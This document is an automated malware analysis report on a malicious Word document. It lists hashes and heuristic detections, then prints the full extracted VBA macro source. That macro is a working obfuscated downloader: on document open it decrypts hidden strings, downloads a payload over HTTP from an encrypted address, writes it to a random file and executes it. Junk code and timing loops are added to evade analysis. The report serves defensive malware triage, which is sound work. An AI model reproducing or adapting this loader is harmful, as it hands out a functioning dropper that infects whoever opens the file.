Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 8b1d622516ad8864…

MALICIOUS

Office (OOXML)

35.3 KB
Created: 2015-06-24 11:31:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2015-10-05
MD5: de7e65fd3cb1fca70602bef6481e90d0
SHA-1: 63ffdbbddbb759241fbf0c68c5270d14f3e9dbb8
SHA-256: 8b1d622516ad886428a9028813e17326260dcaa6e0f3335e0736c329dd09b321
360 Risk Score

Heuristics 11

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set GT6i9tdOslXbCF3Y = CreateObject(GD2JWBthipooPdm(VCOaufui5IgdsYD("9FB1A32C4F69E6BBCEB8B74B8CBC51E4EC"), "QGzOicuuWxo1Re"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set GT6i9tdOslXbCF3Y = CreateObject(GD2JWBthipooPdm(VCOaufui5IgdsYD("9FB1A32C4F69E6BBCEB8B74B8CBC51E4EC"), "QGzOicuuWxo1Re"))
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    CallByName BFCtsag9BmyU, 94, VbMethod, 11, 35, 89
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    D5sD2YzXccXtd = Environ(GD2JWBthipooPdm(VCOaufui5IgdsYD("BA88796A119815"), "CiPh2O5u7")) & "\" & TQVKxDfZAwhZj & GD2JWBthipooPdm(VCOaufui5IgdsYD("C7801245"), "DzzeAa")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 15676 bytes
SHA-256: 15c4f71b30d62dca6888f9c85f4f1fd4dfc64fac75895af94812a6ac9c3ca9b2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
115 of 210 identifiers look randomly generated (e.g. 'E0F30B1421CBB403BD'); 5 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function Tk5QWKK1zqx5l8k1L Lib "kernel32" Alias "_lwrite" (ByVal GhpAUCt4 As Long, TeElHWv2eFUM83B6 As Any, ByVal H5GnSRl4GJPp As Long) As Long
Private Declare PtrSafe Function Gngoj0INWe1IDVyD Lib "kernel32" Alias "_lcreat" (ByVal Umw7mc2tX6 As String, ByVal O7mMY9yhc As Long) As Long
Private Declare PtrSafe Function WA9cuAQKiNt Lib "kernel32" Alias "_lclose" (ByVal KJHXC5HqjR9PuylR As Long) As Long
#Else
Private Declare Function WA9cuAQKiNt Lib "kernel32" Alias "_lclose" (ByVal KJHXC5HqjR9PuylR As Long) As Long
Private Declare Function Tk5QWKK1zqx5l8k1L Lib "kernel32" Alias "_lwrite" (ByVal GhpAUCt4 As Long, TeElHWv2eFUM83B6 As Any, ByVal H5GnSRl4GJPp As Long) As Long
Private Declare Function Gngoj0INWe1IDVyD Lib "kernel32" Alias "_lcreat" (ByVal Umw7mc2tX6 As String, ByVal O7mMY9yhc As Long) As Long
#End If
Sub Document_Open()
Dim NaTECIcDv8gx As Long, PWE7M52ya As Long
NaTECIcDv8gx = 52
PWE7M52ya = 89
If NaTECIcDv8gx + PWE7M52ya > 2 Then
PWE7M52ya = NaTECIcDv8gx + 50
Else
PWE7M52ya = 95 + 30 + 80
End If
On Error Resume Next
Dim JCOsbPWmrzfykB As Long, WecLicuBJpeiK1U As Long
JCOsbPWmrzfykB = 89
WecLicuBJpeiK1U = 77
If JCOsbPWmrzfykB + WecLicuBJpeiK1U > 2 Then
WecLicuBJpeiK1U = JCOsbPWmrzfykB + 13
Else
WecLicuBJpeiK1U = 7 + 51 + 92
End If
Dim RQjSntQdTU0B8nT As Long, BD8Iq4sOQPL As Long, OXSxWXLoz6Z As Long
Dim QuglLXu0 As Long, GN0DlGBLcvScUd9Gc As Long
QuglLXu0 = 44
GN0DlGBLcvScUd9Gc = 87
If QuglLXu0 + GN0DlGBLcvScUd9Gc > 2 Then
GN0DlGBLcvScUd9Gc = QuglLXu0 + 56
Else
GN0DlGBLcvScUd9Gc = 76 + 88 + 80
End If
RQjSntQdTU0B8nT = 958711258: BD8Iq4sOQPL = 0: OXSxWXLoz6Z = 0
Dim RZWYrzOp As Long, Auour7TlthCbdzx As Long
RZWYrzOp = 69
Auour7TlthCbdzx = 38
If RZWYrzOp + Auour7TlthCbdzx > 2 Then
Auour7TlthCbdzx = RZWYrzOp + 4
Else
Auour7TlthCbdzx = 8 + 47 + 3
End If
For BD8Iq4sOQPL = 1 To RQjSntQdTU0B8nT
OXSxWXLoz6Z = OXSxWXLoz6Z + 1
Next BD8Iq4sOQPL
Dim Ns3CvqReV6 As Long, GvYboW9jVBA As Long
Ns3CvqReV6 = 94
GvYboW9jVBA = 34
If Ns3CvqReV6 + GvYboW9jVBA > 2 Then
GvYboW9jVBA = Ns3CvqReV6 + 70
Else
GvYboW9jVBA = 59 + 39 + 1
End If
If OXSxWXLoz6Z = RQjSntQdTU0B8nT Then
Dim IvsirXcthqT As Long, HhdpSSUCkaZ3dU As Long
IvsirXcthqT = 3
HhdpSSUCkaZ3dU = 63
If IvsirXcthqT + HhdpSSUCkaZ3dU > 2 Then
HhdpSSUCkaZ3dU = IvsirXcthqT + 11
Else
HhdpSSUCkaZ3dU = 12 + 9 + 18
End If
Dim HRZQpk As Long, RbaCas6pQjvGiUSa As Long
HRZQpk = 60
RbaCas6pQjvGiUSa = 64
If HRZQpk + RbaCas6pQjvGiUSa > 2 Then
RbaCas6pQjvGiUSa = HRZQpk + 4
Else
RbaCas6pQjvGiUSa = 59 + 67 + 94
End If
D9tB1rwjkp0d2rRx
Dim FrPTNtKku6V As Long, MbgBtxN As Long
FrPTNtKku6V = 48
MbgBtxN = 98
If FrPTNtKku6V + MbgBtxN > 2 Then
MbgBtxN = FrPTNtKku6V + 29
Else
MbgBtxN = 10 + 15 + 98
End If
Else
Dim PTFr6L8 As Long, IGdyVRRdWlmw As Long
PTFr6L8 = 60
IGdyVRRdWlmw = 88
If PTFr6L8 + IGdyVRRdWlmw > 2 Then
IGdyVRRdWlmw = PTFr6L8 + 30
Else
IGdyVRRdWlmw = 7 + 25 + 70
End If
CnIEIvWO9
Dim SWZEbM9D As Long, Xcb As Long
SWZEbM9D = 32
Xcb = 75
If SWZEbM9D + Xcb > 2 Then
Xcb = SWZEbM9D + 44
Else
Xcb = 64 + 76 + 68
End If
End If
Dim Vqlkk6 As Long, KjvGiUSaMh As Long
Vqlkk6 = 30
KjvGiUSaMh = 81
If Vqlkk6 + KjvGiUSaMh > 2 Then
KjvGiUSaMh = Vqlkk6 + 25
Else
KjvGiUSaMh = 23 + 76 + 41
End If
End Sub
Sub D9tB1rwjkp0d2rRx()
Dim Ert2LK As Long, D7rit As Long
Ert2LK = 63
D7rit = 33
If Ert2LK + D7rit > 2 Then
D7rit = Ert2LK + 97
Else
D7rit = 3 + 42 + 96
End If
Dim D5sD2YzXccXtd As String, GT6i9tdOslXbCF3Y As Object
Dim NEWB As Long, Ac2NUlaxI5eo As Long
NEWB = 48
Ac2NUlaxI5eo = 49
If NEWB + Ac2NUlaxI5eo > 2 Then
Ac2NUlaxI5eo = NEWB + 46
Else
Ac2NUlaxI5eo = 56 + 27 + 14
End If
D5sD2YzXccXtd = Environ(GD2JWBthipooPdm(VCOaufui5IgdsYD("BA88796A119815"), "CiPh2O5u7")) & "\" & TQVKxDfZAwhZj & GD2JWBthipooPdm(VCOaufui5IgdsYD("C7801245"), "DzzeAa")
Dim BoQnRzrjQp As Long, YgxamZzV4lNx As Long
BoQnRzrjQp = 43
YgxamZzV4lNx = 93
If BoQnRzrjQp + YgxamZzV4lNx > 2 Then
YgxamZzV4lNx = BoQnRzrjQp + 15
Else
YgxamZzV4lNx = 4 + 39 + 7
End If
Set GT6i9tdOslXbCF3Y = CreateObject(GD2JWBthipooPdm(VCOaufui5IgdsYD("9FB1A32C4F69E6BBCEB8B74B8CBC51E4EC"), "QGzOicuuWxo1Re"))
Dim LL6L02KKEUXpq As Long, BuISgnG3kV As Long
LL6L02KKEUXpq = 55
BuISgnG3kV = 30
If LL6L02KKEUXpq + BuISgnG3kV > 2 Then
BuISgnG3kV = LL6L02KKEUXpq + 4
Else
BuISgnG3kV = 56 + 24 + 51
End If
GT6i9tdOslXbCF3Y.Open GD2JWBthipooPdm(VCOaufui5IgdsYD("7D8E15"), "UmuELG2see"), GD2JWBthipooPdm(VCOaufui5IgdsYD("356FF1222751477B340D742A954ADCAE29A4871541A2031DC5F794"), "Ak1dNyiB7"), False
Dim GbwcnkIgvf As Long, QLKP As Long
GbwcnkIgvf = 49
QLKP = 74
If GbwcnkIgvf + QLKP > 2 Then
QLKP = GbwcnkIgvf + 72
Else
QLKP = 4 + 11 + 16
End If
GT6i9tdOslXbCF3Y.setRequestHeader GD2JWBthipooPdm(VCOaufui5IgdsYD("1CEE157DE0F83E4E1BF0"), "I7lT6o3QB"), GD2JWBthipooPdm(VCOaufui5IgdsYD("ACA07173589D880D091240"), "GhnHI")
GT6i9tdOslXbCF3Y.send
If GT6i9tdOslXbCF3Y.readyState = 4 And GT6i9tdOslXbCF3Y.Status = 200 Then
Dim P3kVdSBtm2ja As Long, B2seepHU As Long
P3kVdSBtm2ja = 35
B2seepHU = 63
If P3kVdSBtm2ja + B2seepHU > 2 Then
B2seepHU = P3kVdSBtm2ja + 5
Else
B2seepHU = 8 + 26 + 45
End If
YkJZN0Q72EzA D5sD2YzXccXtd, GD2JWBthipooPdm(StrConv(GT6i9tdOslXbCF3Y.ResponseBody, vbUnicode), GD2JWBthipooPdm(VCOaufui5IgdsYD("E0F30B1421CBB403BD"), "XsOJ9WSFHTfioE"))
Dim FQDIJzVO As Long, OfJs9R As Long
FQDIJzVO = 21
OfJs9R = 33
If FQDIJzVO + OfJs9R > 2 Then
OfJs9R = FQDIJzVO + 70
Else
OfJs9R = 85 + 65 + 26
End If
LPeLdfiOGaom 1
Dim Yq9KATP7JzYlQlC As Long, RuAJ9zlGG4ODkoc As Long
Yq9KATP7JzYlQlC = 27
RuAJ9zlGG4ODkoc = 41
If Yq9KATP7JzYlQlC + RuAJ9zlGG4ODkoc > 2 Then
RuAJ9zlGG4ODkoc = Yq9KATP7JzYlQlC + 44
Else
RuAJ9zlGG4ODkoc = 62 + 8 + 97
End If
CreateObject(GD2JWBthipooPdm(VCOaufui5IgdsYD("64B9578892015043C9AF62162D"), "BolfCtqA1cKp")).exec """" & D5sD2YzXccXtd & """"
Dim XQhr3MSlD As Long, G7F2ZpnLLa As Long
XQhr3MSlD = 84
G7F2ZpnLLa = 93
If XQhr3MSlD + G7F2ZpnLLa > 2 Then
G7F2ZpnLLa = XQhr3MSlD + 65
Else
G7F2ZpnLLa = 51 + 65 + 24
End If
End If
Dim KTy85XBgD1gsT66o As Long, M385YC8rJVxOy As Long
KTy85XBgD1gsT66o = 45
M385YC8rJVxOy = 57
If KTy85XBgD1gsT66o + M385YC8rJVxOy > 2 Then
M385YC8rJVxOy = KTy85XBgD1gsT66o + 49
Else
M385YC8rJVxOy = 72 + 5 + 33
End If
Set GT6i9tdOslXbCF3Y = Nothing
Dim SMSlDUoo As Long, KZpnLLa0XhLhfx As Long
SMSlDUoo = 69
KZpnLLa0XhLhfx = 11
If SMSlDUoo + KZpnLLa0XhLhfx > 2 Then
KZpnLLa0XhLhfx = SMSlDUoo + 14
Else
KZpnLLa0XhLhfx = 32 + 51 + 41
End If
End Sub
Sub LPeLdfiOGaom(HnCFz2Jiz As Long)
Dim W87tKzf As Long, KjhQZfQsbAVJtuU3r As Long
W87tKzf = 5
KjhQZfQsbAVJtuU3r = 61
If W87tKzf + KjhQZfQsbAVJtuU3r > 2 Then
KjhQZfQsbAVJtuU3r = W87tKzf + 64
Else
KjhQZfQsbAVJtuU3r = 27 + 39 + 76
End If
Dim Yo0l As Long
Dim ACMz9PVtQekZQm As Long, FjnPse2j As Long
ACMz9PVtQekZQm = 77
FjnPse2j = 13
If ACMz9PVtQekZQm + FjnPse2j > 2 Then
FjnPse2j = ACMz9PVtQekZQm + 8
Else
FjnPse2j = 51 + 93 + 40
End If
Yo0l = Timer + HnCFz2Jiz
Do While Timer < Yo0l
DoEvents
Loop
Dim ScC3hL2mIolMN As Long, Oi91ON As Long
ScC3hL2mIolMN = 26
Oi91ON = 15
If ScC3hL2mIolMN + Oi91ON > 2 Then
Oi91ON = ScC3hL2mIolMN + 50
Else
Oi91ON = 44 + 87 + 56
End If
End Sub
Function VCOaufui5IgdsYD(LDGRNsY7g9Q3SG2 As String) As String
Dim A0dgfZCMz9 As Long, HJy385Y As Long
A0dgfZCMz9 = 59
HJy385Y = 67
If A0dgfZCMz9 + HJy385Y > 2 Then
HJy385Y = A0dgfZCMz9 + 18
Else
HJy385Y = 68 + 89 + 77
End If
Dim HrXL87kb As Integer
Dim ItnBdglWBM As Long, DsOipZ5TwQEC As Long
ItnBdglWBM = 82
DsOipZ5TwQEC = 72
If ItnBdglWBM + DsOipZ5TwQEC > 2 Then
DsOipZ5TwQEC = ItnBdglWBM + 29
Else
DsOipZ5TwQEC = 33 + 95 + 34
End If
For HrXL87kb = 1 To Len(LDGRNsY7g9Q3SG2) Step 2
VCOaufui5IgdsYD = VCOaufui5IgdsYD & Chr$(Val(Chr$(38) & Chr$(72) & Mid$(LDGRNsY7g9Q3SG2, HrXL87kb, 2)))
Next
Dim Ev0H2eoVH6 As Long, OvoJTND0xZxdq As Long
Ev0H2eoVH6 = 13
OvoJTND0xZxdq = 33
If Ev0H2eoVH6 + OvoJTND0xZxdq > 2 Then
OvoJTND0xZxdq = Ev0H2eoVH6 + 73
Else
OvoJTND0xZxdq = 98 + 74 + 48
End If
End Function
Function GD2JWBthipooPdm(ByVal Qb5elCmoyG As String, ByVal OlroKXMXHgE As String) As String
Dim AKEmEhS As Long, BmgOCSMUfqtAYTM2T As Long
AKEmEhS = 28
BmgOCSMUfqtAYTM2T = 34
If AKEmEhS + BmgOCSMUfqtAYTM2T > 2 Then
BmgOCSMUfqtAYTM2T = AKEmEhS + 18
Else
BmgOCSMUfqtAYTM2T = 65 + 22 + 80
End If
On Error Resume Next
Dim IBsjdSTadV As Long, AxdqtIkN As Long
IBsjdSTadV = 80
AxdqtIkN = 29
If IBsjdSTadV + AxdqtIkN > 2 Then
AxdqtIkN = IBsjdSTadV + 58
Else
AxdqtIkN = 44 + 14 + 78
End If
Dim M9Bm84vB9VPFBlmfW(0 To 255) As Integer, RuCCbLggZ1h As Long, MB1TOMuiZrQ As Long, VWeZXqXwz As Long, RzE() As Byte, Owuj3YFjx2() As Byte, YwiNcdLBCC As Byte
Dim QJFxRcpyZDNlRZ As Long, MpBn4FKgpjwexU As Long
QJFxRcpyZDNlRZ = 22
MpBn4FKgpjwexU = 80
If QJFxRcpyZDNlRZ + MpBn4FKgpjwexU > 2 Then
MpBn4FKgpjwexU = QJFxRcpyZDNlRZ + 76
Else
MpBn4FKgpjwexU = 42 + 20 + 59
End If
RzE() = StrConv(OlroKXMXHgE, vbFromUnicode)
Dim HtIkNDG9g0vQ As Long, PgviHdO20Md As Long
HtIkNDG9g0vQ = 49
PgviHdO20Md = 25
If HtIkNDG9g0vQ + PgviHdO20Md > 2 Then
PgviHdO20Md = HtIkNDG9g0vQ + 43
Else
PgviHdO20Md = 88 + 78 + 35
End If
For RuCCbLggZ1h = 0 To 255
M9Bm84vB9VPFBlmfW(RuCCbLggZ1h) = RuCCbLggZ1h
Next RuCCbLggZ1h
RuCCbLggZ1h = 0
MB1TOMuiZrQ = 0
VWeZXqXwz = 0
For RuCCbLggZ1h = 0 To 255
MB1TOMuiZrQ = (MB1TOMuiZrQ + M9Bm84vB9VPFBlmfW(RuCCbLggZ1h) + RzE(RuCCbLggZ1h Mod Len(OlroKXMXHgE))) Mod 256
YwiNcdLBCC = M9Bm84vB9VPFBlmfW(RuCCbLggZ1h)
M9Bm84vB9VPFBlmfW(RuCCbLggZ1h) = M9Bm84vB9VPFBlmfW(MB1TOMuiZrQ)
M9Bm84vB9VPFBlmfW(MB1TOMuiZrQ) = YwiNcdLBCC
Next RuCCbLggZ1h
RuCCbLggZ1h = 0
MB1TOMuiZrQ = 0
VWeZXqXwz = 0
Owuj3YFjx2() = StrConv(Qb5elCmoyG, vbFromUnicode)
For RuCCbLggZ1h = 0 To Len(Qb5elCmoyG)
MB1TOMuiZrQ = (MB1TOMuiZrQ + 1) Mod 256
VWeZXqXwz = (VWeZXqXwz + M9Bm84vB9VPFBlmfW(MB1TOMuiZrQ)) Mod 256
YwiNcdLBCC = M9Bm84vB9VPFBlmfW(MB1TOMuiZrQ)
M9Bm84vB9VPFBlmfW(MB1TOMuiZrQ) = M9Bm84vB9VPFBlmfW(VWeZXqXwz)
M9Bm84vB9VPFBlmfW(VWeZXqXwz) = YwiNcdLBCC
Owuj3YFjx2(RuCCbLggZ1h) = Owuj3YFjx2(RuCCbLggZ1h) Xor (M9Bm84vB9VPFBlmfW((M9Bm84vB9VPFBlmfW(MB1TOMuiZrQ) + M9Bm84vB9VPFBlmfW(VWeZXqXwz)) Mod 256))
Next RuCCbLggZ1h
Dim NBlknCxetRb0ZEC As Long, BQ5RTYRV As Long
NBlknCxetRb0ZEC = 62
BQ5RTYRV = 83
If NBlknCxetRb0ZEC + BQ5RTYRV > 2 Then
BQ5RTYRV = NBlknCxetRb0ZEC + 94
Else
BQ5RTYRV = 87 + 10 + 42
End If
GD2JWBthipooPdm = StrConv(Owuj3YFjx2, vbUnicode)
Dim YSTr3QgBZIN6yPLWz As Long, JliYPMsLNdk As Long
YSTr3QgBZIN6yPLWz = 33
JliYPMsLNdk = 21
If YSTr3QgBZIN6yPLWz + JliYPMsLNdk > 2 Then
JliYPMsLNdk = YSTr3QgBZIN6yPLWz + 56
Else
JliYPMsLNdk = 50 + 94 + 62
End If
End Function
Function TQVKxDfZAwhZj() As String
Dim KnlARNhz33 As Long, GLP As Long
KnlARNhz33 = 73
GLP = 4
If KnlARNhz33 + GLP > 2 Then
GLP = KnlARNhz33 + 84
Else
GLP = 89 + 73 + 22
End If
Dim It3uEqi1Jz2Z4i1M() As Byte, NwYJ7efQeh7S() As Byte, GfUud As Long, Ukb2O As Long, A00fGP36W As String, XsPCbWU8joa78e As String, Ny9vmRx As Long
Dim NyqlIzVtn5L8 As Long, YB5zOVccUOZ As Long
NyqlIzVtn5L8 = 49
YB5zOVccUOZ = 50
If NyqlIzVtn5L8 + YB5zOVccUOZ > 2 Then
YB5zOVccUOZ = NyqlIzVtn5L8 + 47
Else
YB5zOVccUOZ = 56 + 27 + 14
End If
Ny9vmRx = 0
Dim WI3IR0BC9M79pK As Long, RkHss7 As Long
WI3IR0BC9M79pK = 54
RkHss7 = 34
If WI3IR0BC9M79pK + RkHss7 > 2 Then
RkHss7 = WI3IR0BC9M79pK + 94
Else
RkHss7 = 85 + 86 + 83
End If
ChRa37WMyC14ZV:
Dim WzMRHC2p2PA As Long, GBJmj0IlFMwt6joX As Long
WzMRHC2p2PA = 63
GBJmj0IlFMwt6joX = 5
If WzMRHC2p2PA + GBJmj0IlFMwt6joX > 2 Then
GBJmj0IlFMwt6joX = WzMRHC2p2PA + 81
Else
GBJmj0IlFMwt6joX = 45 + 35 + 91
End If
Randomize
XsPCbWU8joa78e = Int(30 * Rnd)
If XsPCbWU8joa78e < 4 Then GoTo ChRa37WMyC14ZV
Ny9vmRx = XsPCbWU8joa78e
If Ny9vmRx > 0& Then
Dim EV7kYkEr As Long, F3bimM As Long
EV7kYkEr = 33
F3bimM = 45
If EV7kYkEr + F3bimM > 2 Then
F3bimM = EV7kYkEr + 59
Else
F3bimM = 18 + 43 + 41
End If
A00fGP36W = GD2JWBthipooPdm(VCOaufui5IgdsYD("49141AE6EFD9109E11A1"), "WimM25s8BRY2")
Randomize
It3uEqi1Jz2Z4i1M = A00fGP36W
GfUud = Len(A00fGP36W) - 1&
Ny9vmRx = (Ny9vmRx * 2&) - 1&
ReDim NwYJ7efQeh7S(Ny9vmRx) As Byte
Dim RdBDn As Long, BuHXJD43ja As Long
RdBDn = 17
BuHXJD43ja = 46
If RdBDn + BuHXJD43ja > 2 Then
BuHXJD43ja = RdBDn + 32
Else
BuHXJD43ja = 1 + 66 + 70
End If
For Ukb2O = 0& To Ny9vmRx Step 2&
NwYJ7efQeh7S(Ukb2O) = It3uEqi1Jz2Z4i1M(CLng(GfUud * Rnd) * 2&)
Next
Dim Nn9ksyK As Long, LlXCSNZ0qbWOJ As Long
Nn9ksyK = 44
LlXCSNZ0qbWOJ = 63
If Nn9ksyK + LlXCSNZ0qbWOJ > 2 Then
LlXCSNZ0qbWOJ = Nn9ksyK + 30
Else
LlXCSNZ0qbWOJ = 30 + 5 + 78
End If
End If
Dim VU94okUoZnY As Long, QAiLfyhJ60r As Long
VU94okUoZnY = 25
QAiLfyhJ60r = 93
If VU94okUoZnY + QAiLfyhJ60r > 2 Then
QAiLfyhJ60r = VU94okUoZnY + 14
Else
QAiLfyhJ60r = 26 + 18 + 40
End If
TQVKxDfZAwhZj = NwYJ7efQeh7S
Dim VYG9e7PQw8OqGQXYp As Long, REjVMXDBB3z1 As Long
VYG9e7PQw8OqGQXYp = 34
REjVMXDBB3z1 = 20
If VYG9e7PQw8OqGQXYp + REjVMXDBB3z1 > 2 Then
REjVMXDBB3z1 = VYG9e7PQw8OqGQXYp + 34
Else
REjVMXDBB3z1 = 92 + 18 + 16
End If
End Function
Sub CnIEIvWO9()
Dim Glu As Long, KJ4ab As Long
Glu = 21
KJ4ab = 58
If Glu + KJ4ab > 2 Then
KJ4ab = Glu + 19
Else
KJ4ab = 65 + 23 + 94
End If
Atn 2
Month 64
LZ8z8KtsJEresKj = Dir("U6ULZ")
Err.Clear
Second 3
DeleteSetting "SMzku"
QklAcX37n = Fix(13)
CQayNwfXOg = UCase(29)
DateSerial 9, 69, 86
Round 87, 84
IRKfJLWPo = DateValue(94)
If CByte(39) = True Then HCZDdIlLHKiJ788 = 5265
If IsMissing(24) = True Then IbTxDjxz = 49
App.LogEvent "Y4rDJuZhkE1L"
InputBox 47, 78, 85, 90, 74
Tym52iTXFp = Cos(10)
Hour 23
Ys8YXOIBvvz = CVar(52)
Sin 38
IPmt 8, 72, 77, 17
Err.Raise 71
Rate 80, 7, 1
Choose 67, ILn8E6cYUtZ0qbWOJ
If CBool(92) = True Then IRKfJLWTRm = 42
Year 42
CallByName BFCtsag9BmyU, 94, VbMethod, 11, 35, 89
Load Kl1f9
Switch 27
FV 87, 33, 67
Tan 18
Dim WMnXy9nI As Long, BJ1rKAQmEAEKR As Long
WMnXy9nI = 40
BJ1rKAQmEAEKR = 20
If WMnXy9nI + BJ1rKAQmEAEKR > 2 Then
BJ1rKAQmEAEKR = WMnXy9nI + 80
Else
BJ1rKAQmEAEKR = 97 + 98 + 95
End If
End Sub
Function YkJZN0Q72EzA(ByKatg As String, ToSgtKmFri9VtHd As String)
Dim WVW3y6iiMyi As Long, MDAD5M1zQQG As Long
WVW3y6iiMyi = 75
MDAD5M1zQQG = 64
If WVW3y6iiMyi + MDAD5M1zQQG > 2 Then
MDAD5M1zQQG = WVW3y6iiMyi + 93
Else
MDAD5M1zQQG = 37 + 79 + 27
End If
Dim LbrWvWUomyXH As Long
Dim HgMWyW2GvT As Long, DFmlUxUKqhP As Long
HgMWyW2GvT = 62
DFmlUxUKqhP = 30
If HgMWyW2GvT + DFmlUxUKqhP > 2 Then
DFmlUxUKqhP = HgMWyW2GvT + 74
Else
DFmlUxUKqhP = 43 + 63 + 74
End If
LbrWvWUomyXH = Gngoj0INWe1IDVyD(ByKatg, 128)
Dim KkpkXMjEOh As Long, GT7dOBlOugmtLqGt As Long
KkpkXMjEOh = 82
GT7dOBlOugmtLqGt = 69
If KkpkXMjEOh + GT7dOBlOugmtLqGt > 2 Then
GT7dOBlOugmtLqGt = KkpkXMjEOh + 83
Else
GT7dOBlOugmtLqGt = 42 + 66 + 65
End If
Tk5QWKK1zqx5l8k1L LbrWvWUomyXH, ByVal ToSgtKmFri9VtHd, Len(ToSgtKmFri9VtHd)
Dim YRHw8tm38Cpc As Long, GfqwsnlaSb As Long
YRHw8tm38Cpc = 55
GfqwsnlaSb = 53
If YRHw8tm38Cpc + GfqwsnlaSb > 2 Then
GfqwsnlaSb = YRHw8tm38Cpc + 7
Else
GfqwsnlaSb = 71 + 5 + 77
End If
WA9cuAQKiNt LbrWvWUomyXH
Dim KK99hfqy00QsbZ As Long, WABX9SYvhOo As Long
KK99hfqy00QsbZ = 29
WABX9SYvhOo = 29
If KK99hfqy00QsbZ + WABX9SYvhOo > 2 Then
WABX9SYvhOo = KK99hfqy00QsbZ + 81
Else
WABX9SYvhOo = 97 + 22 + 76
End If
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 38400 bytes
SHA-256: 333cc24118a0ec015044cb6d57e0f2d7d3d29c9fba5086e40e4f098ac7d7ff0e
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: unlikely